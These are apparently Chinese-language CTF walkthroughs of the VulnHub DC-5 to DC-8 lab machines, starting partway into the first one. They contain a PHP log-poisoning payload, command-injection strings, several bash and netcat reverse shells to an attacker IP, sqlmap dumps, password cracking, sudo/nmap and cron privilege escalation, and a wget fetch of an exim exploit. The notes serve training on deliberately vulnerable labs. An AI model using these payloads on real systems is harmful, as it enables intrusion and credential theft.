gobuster dir -u http://192.168.1.7/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50
dirsearch -u http://192.168.1.7 -e php,html,txt,js,bak -t 50 -w /usr/share/wordlists/dirb/common.txt

(Status: 200) [Size: 4025]

images               (Status: 301) [Size: 184] [--> http://192.168.1.7/images/]
contact.php          (Status: 200) [Size: 4282]
faq.php              (Status: 200) [Size: 5645]
solutions.php        (Status: 200) [Size: 4100]
footer.php           (Status: 200) [Size: 17]
css                  (Status: 301) [Size: 184] [--> http://192.168.1.7/css/]
about-us.php         (Status: 200) [Size: 4292]
thankyou.php         (Status: 200) [Size: 852]

LFI

找了wp才知道存在文件包含

1	`http://192.168.1.7/contact.php`

提交表单后跳转到/thankyou.php

刷新下方的脚表会一直变化

根据目录扫描结果，存在单独的footer.php ，也有同样效果，而其他页面的脚标不会变化，只有/thankyou.php，可以推断/thankyou.php页面包含了footer.php

fuzz

1	`ffuf -u "http://192.168.1.7/thankyou.php?FUZZ=./thankyou.php" -w fuzz_params.txt`

得到参数file

http://192.168.1.7/thankyou.php?file=/etc/passwd

得到passwd

根据nmap结果，nginx 1.6.2寻找日志文件

1	`/var/log/nginx/error.log`

写入日志

1	`curl http://192.168.1.7/ -H "User-Agent: <?php system($_POST['cmd']); phpinfo();?>"`

蚁剑连接

反弹shell

1	`/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.1.17/6666 0>&1'`

suid screen提权

寻找suid

1	`find / -perm -4000 2>/dev/null`

发现存在/bin/screen-4.5.0

1	`searchsploit screen 4.5.0`

存在脚本，下载并上传靶机

执行

在root目录得到flag

888b    888 d8b                                                      888      888 888 888 
8888b   888 Y8P                                                      888      888 888 888 
88888b  888                                                          888      888 888 888 
888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888 
888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888 
888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P 
888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "  
888    Y888 888  "Y8888P "Y8888        "Y8888888P"   "Y88P"  888     888  888 888 888 888 
                                                                                          
                                                                                          


Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated.  :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.

DC6

vulnhub dc6

https://www.vulnhub.com/entry/dc-6,315/

靶机IP

1	`192.168.1.12`

写入hosts

1	`192.168.1.12 wordy`

信息收集

1	`nmap -p- --min-rate 10000 192.168.1.12 -oN nmap/port.txt`

1
2
3

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

1	`nmap -sT -sC -sV -O -p22,80 192.168.1.12 -oN nmap/detail.txt`

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Wordy &#8211; Just another WordPress site
|_http-generator: WordPress 5.1.1
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 08:00:27:AA:DF:23 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

操作系统：Linux 3.2 - 4.14（Debian）
Web服务器：Apache 2.4.25 (Debian)
CMS系统：WordPress 5.1.1

1	`dirsearch -u http://192.168.1.12 -e php,html,txt,js,bak -t 50 -w /usr/share/wordlists/dirb/common.txt`

1	`gobuster dir -u http://192.168.1.12/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50`

/index.php
/wp-admin
/wp-content
/wp-includes
/xmlrpc.php
/wp-login.php
/license.txt
/readme.html
/wp-trackback.php
/wp-signup.php
/server-status

wpscan

已知cms为WordPress 5.1.1，使用wpscan进行枚举

用户

1	`wpscan --url http://wordy --enumerate u`

admin
sarah
graham
mark
jens

爆破

1	`wpscan --url http://wordy/ -U users.txt -P /usr/share/wordlists/rockyou.txt`

得到凭据

1	`mark:helpdesk01`

后台RCE

使用凭据登录

1	`http://wordy/wp-login.php?registration=disabled`

Activity monitor -> toos -> lookup存在命令执行

------WebKitFormBoundaryBvV7QrEP9iMYIXcG
Content-Disposition: form-data; name="ip"

127.0.0.1 || whoami
------WebKitFormBoundaryBvV7QrEP9iMYIXcG
Content-Disposition: form-data; name="lookup"

反弹shell

1	`127.0.0.1 \|\| nc -c /bin/bash 192.168.1.17 6666`

在/home/mark/stuff/things-to-do.txt 找到信息

Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

得到另一组凭据

1	`graham:GSo7isUM1D4`

ssh登录

backups.sh横向

在/home/jens发现备份脚本backups.sh，且graham用户sudo权限为

1	`(jens) NOPASSWD: /home/jens/backups.sh`

用户 graham 可以在不输入密码的情况下，以用户 jens 的身份执行 /home/jens/backups.sh 这个脚本

1 2	`echo '#!/bin/bash' > backups.sh echo 'bash -i >& /dev/tcp/192.168.1.17/7777 0>&1' >> backups.sh`

1	`sudo -u jens /home/jens/backups.sh`

拿到jens权限

nmap提权

sudo -l发现有/usr/bin/nmap 权限

提权

1 2	`echo 'os.execute("/bin/bash")' > /tmp/shell.nse sudo nmap --script=/tmp/shell.nse`

Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' 
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) 


Congratulations!!!

Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

DC7

vulnhub dc7

https://www.vulnhub.com/entry/dc-7,356/

靶机IP

1	`192.168.1.11`

信息收集

1	`nmap -p- --min-rate 10000 192.168.1.11 -oN nmap/port.txt`

1
2
3

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

1	`nmap -sT -sC -sV -O -p22,80 192.168.1.11 -oN nmap/detail.txt`

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
|   256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_  256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
MAC Address: 08:00:27:1A:79:48 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

操作系统：Linux 3.2 - 4.14（Debian）
开放端口：22，80
web服务：Apache 2.4.25
CMS：Drupal 8
robots.txt：包含22条禁止条目，暴露了Drupal常见路径

1	`gobuster dir -u http://192.168.1.11/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50`

1	`dirsearch -u http://192.168.1.11 -e php,html,txt,js,bak -t 50 -w /usr/share/wordlists/dirb/common.txt`

301 - /core -> http://192.168.1.11/core/
301 - /modules -> http://192.168.1.11/modules/
200 - /index.php
301 - /profiles -> http://192.168.1.11/profiles/
200 - /robots.txt
302 - /search -> http://192.168.1.11/search/node
302 - /Search -> http://192.168.1.11/search/node
301 - /sites -> http://192.168.1.11/sites/
301 - /themes -> http://192.168.1.11/themes/
302 - /user -> http://192.168.1.11/user/login
200 - /web.config

挨个查看，似乎并没有什么有用的信息

Github泄露

http://192.168.1.11/user/password

经过枚举，存在用户admin

但作者说爆破无法得出密码，只能从其他地方入手

根据cmsDrupal 8，exploit 发现可能存在cve-2018-7600和CVE-2018-7602

尝试后均失败

根据提示，放弃从网站方面入手

DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are.  :-)

While this challenge isn't all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won't succeed.

What you will have to do, is to think "outside" the box.

Way "outside" the box.  :-)



DC-7引入了一些“新”概念，但我就不一一赘述了，留给你们自己去发现吧。:-)

虽然这个挑战的技术难度并不高，但如果你需要诉诸暴力破解或字典攻击，你可能不会成功。

你需要做的就是跳出思维定式。

完全跳出固有思维模式。:-)

尝试谷歌搜索

https://github.com/Dc7User/staffdb

发现git文件，在config.php发现一组凭据

<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

1	`dc7user:MdR3xOgB7#dW`

cms登录失败，尝试ssh

成功

计划任务

在dc7user用户家目录发现邮件

From root@dc-7 Thu Aug 29 17:00:22 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:00:22 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3EPu-0000CV-5C
        for root@dc-7; Thu, 29 Aug 2019 17:00:22 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EPu-0000CV-5C@dc-7>
Date: Thu, 29 Aug 2019 17:00:22 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:15:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:15:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3EeF-0000Dx-G1
        for root@dc-7; Thu, 29 Aug 2019 17:15:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EeF-0000Dx-G1@dc-7>
Date: Thu, 29 Aug 2019 17:15:11 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:30:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:30:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3Esl-0000Ec-JQ
        for root@dc-7; Thu, 29 Aug 2019 17:30:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Esl-0000Ec-JQ@dc-7>
Date: Thu, 29 Aug 2019 17:30:11 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:45:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:45:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3F7H-0000G3-Nb
        for root@dc-7; Thu, 29 Aug 2019 17:45:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3F7H-0000G3-Nb@dc-7>
Date: Thu, 29 Aug 2019 17:45:11 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 20:45:21 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 20:45:21 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3Hvd-0000ED-CP
        for root@dc-7; Thu, 29 Aug 2019 20:45:21 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Hvd-0000ED-CP@dc-7>
Date: Thu, 29 Aug 2019 20:45:21 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 22:45:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 22:45:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3Jng-0000Iw-Rq
        for root@dc-7; Thu, 29 Aug 2019 22:45:16 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Jng-0000Iw-Rq@dc-7>
Date: Thu, 29 Aug 2019 22:45:16 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Thu Aug 29 23:00:12 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 23:00:12 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3K28-0000Ll-11
        for root@dc-7; Thu, 29 Aug 2019 23:00:12 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3K28-0000Ll-11@dc-7>
Date: Thu, 29 Aug 2019 23:00:12 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Fri Aug 30 00:15:18 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 00:15:18 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3LCo-0000Eb-02
        for root@dc-7; Fri, 30 Aug 2019 00:15:18 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3LCo-0000Eb-02@dc-7>
Date: Fri, 30 Aug 2019 00:15:18 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Fri Aug 30 03:15:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 03:15:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3O0y-0000Ed-To
        for root@dc-7; Fri, 30 Aug 2019 03:15:17 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3O0y-0000Ed-To@dc-7>
Date: Fri, 30 Aug 2019 03:15:17 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]

根据邮件头可以看出这是root发送的定时任务，执行**/opt/scripts/backups.sh**

1	`Subject: Cron <root@dc-7> /opt/scripts/backups.sh`

但该脚本所有者为www-data，因此还是需要拿到反弹shell权限

MySQL

根据刚才得到得凭据尝试登录数据库失败

在/var/www/html/sites/default/settings.php找到真正得数据库凭据

$databases['default']['default'] = array (
  'database' => 'd7db',
  'username' => 'db7user',
  'password' => 'yNv3Po00',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '',
  'namespace' => 'Drupal\\Core\\Database\\Driver\\mysql',
  'driver' => 'mysql',
);

1	`mysql -u db7user -p'yNv3Po00' d7db`

在users_field_data得到数据

uid	username	password hash	email	status
0	(空)	NULL	NULL	0 (禁用)
1	admin	`$S$Ead.KmIcT/yfKC.1H53aDPJasaD7o.ioEGiaPy1lLyXXAJC/Qi4F`	admin@example.com	1 (启用)
2	dc7user	`$S$EKe0kuKQvFhgFnEYMpq.mRtbl/TQ5FmEjCDxbu0HIHaO0/U.YFjI`	dc7user@blah.com	1 (启用)

重置密码

和dc1类似

https://drupalchina.cn/node/2128

/core/scripts/password-hash.sh

1 2	`php scripts/password-hash.sh 123456 password: 123456 hash: $S$E.1j8lHEsC.DgYLxRfdhEplIJJYkauPJvEPJI/t1b03NiiUFEoNY`

1	`UPDATE users_field_data SET pass = '$S$E.1j8lHEsC.DgYLxRfdhEplIJJYkauPJvEPJI/t1b03NiiUFEoNY' WHERE uid = 1;`

但依然登不进后台，不知原因

看了wp，才找到其他改密码方式

Drupal的命令行管理工具Drupal，可以直接用它改密码

1	`drush upwd admin --password="password"`

成功登录后台

页面写shell

Content => Add content =>Basic page可写shell

需要提前导入PHP模块Extend => Install new module

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

写入shell

www-data权限

计划任务提权

1	`echo 'bash -i >& /dev/tcp/192.168.1.17/6666 0>&1' >> /opt/scripts/backups.sh`

等待一段时间，收到shell

得到flag

888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-7.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

If you enjoyed this CTF, send me a tweet via @DCAU7.

DC8

vulnhub dc8

https://www.vulnhub.com/entry/dc-8,367/

靶机IP

1	`192.168.1.13`

信息收集

1	`nmap -p- --min-rate 10000 192.168.1.13 -oN nmap/port.txt`

1
2
3

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

1	`nmap -sT -sC -sV -O -p22,80 192.168.1.13 -oN nmap/detail.txt`

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
|   256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_  256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open  http    Apache httpd
|_http-title: Welcome to DC-8 | DC-8
|_http-server-header: Apache
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
MAC Address: 08:00:27:8C:51:C4 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

开放端口
- 22/tcp: SSH (OpenSSH 7.4p1)
- 80/tcp: HTTP (Apache, 运行 Drupal 7)
CMS: Drupal 7
系统：Linux 3.2 - 4.14

1	`dirsearch -u http://192.168.1.13 -i 200,301`

[07:01:14] 200 -   33KB - /CHANGELOG.txt
[07:01:16] 200 -  769B  - /COPYRIGHT.txt
[07:01:29] 301 -  237B  - /includes  ->  http://192.168.1.13/includes/
[07:01:31] 200 -  868B  - /INSTALL.mysql.txt
[07:01:31] 200 -    1KB - /install.php
[07:01:31] 200 -  842B  - /INSTALL.pgsql.txt
[07:01:31] 200 -    1KB - /install.php?profile=default
[07:01:32] 200 -    6KB - /INSTALL.txt
[07:01:35] 200 -    7KB - /LICENSE.txt
[07:01:38] 200 -    2KB - /MAINTAINERS.txt
[07:01:40] 301 -  233B  - /misc  ->  http://192.168.1.13/misc/
[07:01:41] 301 -  236B  - /modules  ->  http://192.168.1.13/modules/
[07:01:44] 200 -    2KB - /node
[07:01:52] 301 -  237B  - /profiles  ->  http://192.168.1.13/profiles/
[07:01:53] 200 -    2KB - /README.txt
[07:01:55] 200 -  744B  - /robots.txt
[07:01:56] 301 -  236B  - /scripts  ->  http://192.168.1.13/scripts/
[07:01:59] 301 -  234B  - /sites  ->  http://192.168.1.13/sites/
[07:01:59] 200 -  129B  - /sites/all/libraries/README.txt
[07:01:59] 200 -    0B  - /sites/example.sites.php
[07:01:59] 200 -  545B  - /sites/all/themes/README.txt
[07:01:59] 200 -  715B  - /sites/all/modules/README.txt
[07:01:59] 200 -  431B  - /sites/README.txt
[07:02:05] 301 -  235B  - /themes  ->  http://192.168.1.13/themes/
[07:02:08] 200 -    3KB - /UPGRADE.txt
[07:02:09] 200 -    2KB - /user
[07:02:09] 200 -    2KB - /user/
[07:02:09] 200 -    2KB - /user/login/
[07:02:11] 200 -  177B  - /views/ajax/autocomplete/user/a
[07:02:13] 200 -    2KB - /web.config
[07:02:16] 200 -   42B  - /xmlrpc.php

一个个目录看完，并没有找到有用的信息

SQL注入

主页Detail栏发现存在参数sql注入

1	`http://192.168.1.13/?nid=1`

sqlmap -u "http://192.168.1.13/?nid=1" -p nid --dbs --batch --random-agent

[*] d7db
[*] information_schema

sqlmap -u "http://192.168.1.13/?nid=1" -p nid --dbs --batch --random-agent -D d7db --tables



| block                       |
| cache                       |
| filter                      |
| history                     |
| role                        |
| system                      |
| actions                     |
| authmap                     |
| batch                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_views                 |
| cache_views_data            |
| ckeditor_input_format       |
| ckeditor_settings           |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter_format               |
| flood                       |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| site_messages_table         |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
| webform                     |
| webform_component           |
| webform_conditional         |
| webform_conditional_actions |
| webform_conditional_rules   |
| webform_emails              |
| webform_last_download       |
| webform_roles               |
| webform_submissions         |
| webform_submitted_data      |

1	`sqlmap -u "http://192.168.1.13/?nid=1" -p nid --dbs --batch --random-agent -D d7db -T users --dump`

用户名	邮箱	密码哈希 (Drupal 7 $S$ )
admin	dcau-user@outlook.com	`$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z`
john	john@blahsdfsfd.org	`$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF`

破解

1	`john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt`

得到凭据

1	`john:turtle`

成功登入后台

文章getshell

登录到后台，在Contact Us -> Webfirm -> Form setting可以写入php代码

提交contact us表单后则会进入植入代码的页面

反弹shell

exim提权

搜索suid发现存在exim4

查看版本

1
2
3

/usr/sbin/exim4 -bV

Exim version 4.89 #2 built 14-Jun-2017 05:03:07

1	`searchsploit exim \| grep "Privilege"`

1
2
3

wget http://192.168.1.17:8080/46996.sh
chmod +x 46996.sh
./46996.sh -m netcat

得到flag

Brilliant - you have succeeded!!!






888       888          888 888      8888888b.                             888 888 888 888
888   o   888          888 888      888  "Y88b                            888 888 888 888
888  d8b  888          888 888      888    888                            888 888 888 888
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "
